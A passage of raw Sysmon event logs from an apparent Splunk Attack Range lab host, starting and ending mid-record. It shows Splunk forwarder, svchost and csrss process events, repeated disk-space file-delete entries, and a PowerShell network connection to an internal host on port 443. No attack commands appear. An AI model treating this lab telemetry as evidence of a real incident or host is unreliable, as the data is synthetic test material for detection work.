Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.766{B81B27B7-73FF-613B-58B4-03000000C801}4372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035343362Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.350{B81B27B7-73FF-613B-57B4-03000000C801}47442984C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343361Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.098{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-73FF-613B-57B4-03000000C801}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343360Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.098{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343359Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.098{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343358Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.098{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343357Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.098{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343356Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.098{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-73FF-613B-57B4-03000000C801}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343355Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.098{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-73FF-613B-57B4-03000000C801}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343354Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.083{B81B27B7-73FF-613B-57B4-03000000C801}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343353Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.046{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86B28DA8286549A06B736D30A63CEEBB,SHA256=9DEA661EBAE8DA090D6DC47705C4CBE265C3CE5EBBDF4F4DEC87A427B5E6B7A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343382Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:32.396{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7400-613B-59B4-03000000C801}4792C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343381Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:32.396{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343380Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:32.396{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343379Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:32.396{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343378Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:32.396{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343377Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:32.396{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-7400-613B-59B4-03000000C801}4792C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343376Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:32.396{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7400-613B-59B4-03000000C801}4792C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343375Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:32.382{B81B27B7-7400-613B-59B4-03000000C801}4792C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343374Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:32.280{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=306BAC78BA42B25653AC0878E3B23BB7,SHA256=2507E2994B0BD02DAA68BFF98C6AC9C84B20AA44140F1B0A6875651246863D1F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343373Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:32.280{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F782ACD96732B2019057C20DB44FA34,SHA256=5F694079BE44D8E4BB8273CC69AA89AA5D3F52AC3DD860597D1616754AA991F4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:32.065{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51EE391C3BD92AF989CDA375D87CFD6F,SHA256=A7B1F6C68E6364787F62AE43A04F9CE6675BC0AD4465549D815A53DDF54E3366,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343385Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:59.132{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52546-false10.0.1.12-8000- 23542300x800000000000000035343384Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:33.411{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=306BAC78BA42B25653AC0878E3B23BB7,SHA256=2507E2994B0BD02DAA68BFF98C6AC9C84B20AA44140F1B0A6875651246863D1F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343383Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:33.095{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1587CDD0BF350211946E66F548DF49A3,SHA256=0722A0785D9BC6BC6A28AE5DA790F2057CBC23EFF9F2198A5ADA65CDF3267167,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343386Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:34.111{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A957DB866149534A020B54084294060,SHA256=9C2BC0D1E39EF76BA2AEFF0CF93A6D1E64C19C62387B8DB220B0119F58F75F84,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343387Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:35.143{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB3DC1BEE0148FB1E226F45D339B9C12,SHA256=AEE30E860EF4ECAF91137E794A58E5BCD6D2BA45D27437DCEFF3418AF73C4BD5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343389Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:36.277{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0E38EB8A252A3C67BAED765A415B625D,SHA256=2DFF382519C2302E75FBCF47ABDFBAE73834CE3DE52DC70160BE7573527E282D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343388Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:36.162{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F56AE742FB51E3B61EADDBB94AAA40E1,SHA256=FEA756555D2B8F89C5F646D95A76B58B9724DBF6BB3C7E7123DE587FA99D6DD5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343391Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:02.146{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52547-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343390Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:37.224{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=363EB6242810F433BAA3A675D3A958E4,SHA256=B4AF95D27B2D112359A2D392532FBC1CC48FC24A11129ACF87A578A9F6BE04FD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343392Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:38.224{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E220002C6BCF4D2751E148C264C37325,SHA256=C4AF4B94623A9D9BAF96F668FD382F32B48CA8599626EE8A8F6EAB7DAD6CCD39,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343396Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:39.675{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343395Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:05.066{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52548-false10.0.1.12-8000- 23542300x800000000000000035343394Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:39.660{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=8DFC7D7CD85BDAF6EAA870181FB4CD3C,SHA256=1E553DAD23E0FF19A7D56DFF08B482794D4E80B4B4B05E362358757F1B8DB9FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343393Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:39.241{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEC76090B2B9A5526E69FC01ABC2B737,SHA256=0C0D268EF76101149DC066C211C5F7012F01A09452C53449A24949444DB82EEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343397Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:40.259{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 